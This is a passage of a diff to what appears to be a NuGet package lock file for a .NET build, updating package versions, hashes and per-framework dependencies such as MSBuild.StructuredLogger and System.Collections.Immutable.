["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Reflection.Metadata"], "net462": ["System.Reflection.Metadata"], "net47": ["System.Reflection.Metadata"], "net471": ["System.Reflection.Metadata"], "net472": ["System.Reflection.Metadata"], "net48": ["System.Reflection.Metadata"], "net5.0": ["System.Reflection.Metadata"], "net6.0": ["System.Reflection.Metadata"], "net7.0": ["System.Reflection.Metadata"], "net8.0": ["System.Reflection.Metadata"], "net9.0": ["System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Reflection.Metadata"], "netcoreapp2.1": ["System.Reflection.Metadata"], "netcoreapp2.2": ["System.Reflection.Metadata"], "netcoreapp3.0": ["System.Reflection.Metadata"], "netcoreapp3.1": ["System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Reflection.Metadata"], "netstandard2.1": ["System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.TestHost", "id": "Microsoft.TestPlatform.TestHost", "version": "17.12.0", "sha512": "sha512-gYM2BOGQvFEP2fZt61f3f5Gu+imL1G1bvGUrbJjpYcl66R6uzs5yESg0XMn8IgUgldz8RldOOaYmjk2KcSeG1Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net6.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net7.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net8.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net9.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Win32.Primitives", "id": "Microsoft.Win32.Primitives", "version": "4.3.0", "sha512": "sha512-Nm8Hp51y9tYcK3xD6qk43Wjftrg1mdH24CCJsTb6gr7HS21U1uA+CKPGEtUcVZbjU1y8Kynzm5eoJ7Pnx5gm8A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Win32.SystemEvents", "id": "Microsoft.Win32.SystemEvents", "version": "7.0.0", "sha512": "sha512-GO6SWx/wSZIFvxOn67Y6OiIGdz9JGCg5CRDDbSAAvBDQeZFbybu9sEOUb9w/vUlQv+A2XakTFZg9Ug1w+tgbWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Mono.Posix.NETStandard", "id": "Mono.Posix.NETStandard", "version": "1.0.0", "sha512": "sha512-RtGiutQZJAmajvQ0QvBvh73VJye85iW9f9tjZlzF88idLxNMo4lAktP/4Y9ilCpais0LDO0tpoICt9Hdv6wooA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.235", "sha512": "sha512-9ige0SOByBirmeIYZ3fwlwbnXrYZA2trdZV7Mad8z7FiuGbVNOVkGYrzln/+G1eIvmRh9J0pt6xBLwqIYaMxyQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.243", "sha512": "sha512-Egw6dLclkDtfoVK+ncghRfYDEWiHjjmhbJFdqeZfqL/Ddtg+JoHzSMblBBTrn317coXZ7WMDELW3C9ZCpn0ByQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Newtonsoft.Json", "id": "Newtonsoft.Json", "version": "13.0.3", "sha512": "sha512-mbJSvHfRxfX3tR/U6n1WU+mWHXswYc+SB/hkOpx8yZZe68hNZGfymJu0cjsaJEkVzCMqePiU6LdIyogqfIn7kg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": "sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Buffers", "id": "System.Buffers", "version": "4.6.0", "sha512": "sha512-iRbJyTSX9bJVpURLGLiW8Fgk5Vfm5iGCztw4IG4IJYcxJy+BXTCEgEWFeJtO6c+kPnUmQu87KK5m188+qbErcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": "sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition", "id": "System.Composition", "version": "8.0.0", "sha512": "sha512-/AZ/S+sX6awiSeSvOv7997aiwbU6HCcOBJDLecdYQJjDo+4nYCrWwWKQQIZ38VZ6BLh1pDmcYFPZockIuoRIYw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.AttributedModel", "id": "System.Composition.AttributedModel", "version": "8.0.0", "sha512": "sha512-gmEwpwXz+COPtuAASK+ichAg8+0oQAaPOV59g6fDdnt1KWbrymdixAn06bNbkdCUGcBXb8RX5k79cqg0Hqlv1g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "8.0.0", "sha512": "sha512-MP7qMadQGUcMOEyGON5dmy9T+OXubvIx04kFHvTVPfZ/9+ns8dqmFToxoF7IDzJVSWmtOQHDUP2fL1x8F6slTA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": ["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "8.0.0", "sha512": "sha512-HK6mWN38TLXo0jQOzR6so8cH1J8/6MzCfSsQS15bWbFEYKeonKRAZKyTC2E92o+wB1KCkocNpOy01ix61JnWjQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], "netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "8.0.0", "sha512": "sha512-hgGA3KDIx9FN3WYkpMvy0pUqWAul9BTehmqq49dqPxu5E+MbUKqgksU5XRP8M9LoBPZFa8FqBbKeFgCZ3rja2w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "8.0.0", "sha512": "sha512-rKu0GdZ4JYOWUF7br1W7UQFI/UgzWTU03CHY6tnTLZXCMth6YSADGJRRQYrLzpwh2+NuNcBIuv7a7x8J1xsfdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "7.0.0", "sha512": "sha512-g3iVgTpIcjMYpH+sMq5VKjytevOJv+ABsYLKOLj0UZrXp3diFFdnPPqL+orxMD5ktyaTagg2S7ONJInu8itIaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net462": ["System.Security.Permissions"], "net47": ["System.Security.Permissions"], "net471": ["System.Security.Permissions"], "net472": ["System.Security.Permissions"], "net48": ["System.Security.Permissions"], "net5.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net6.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData", "System.Security.Permissions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], 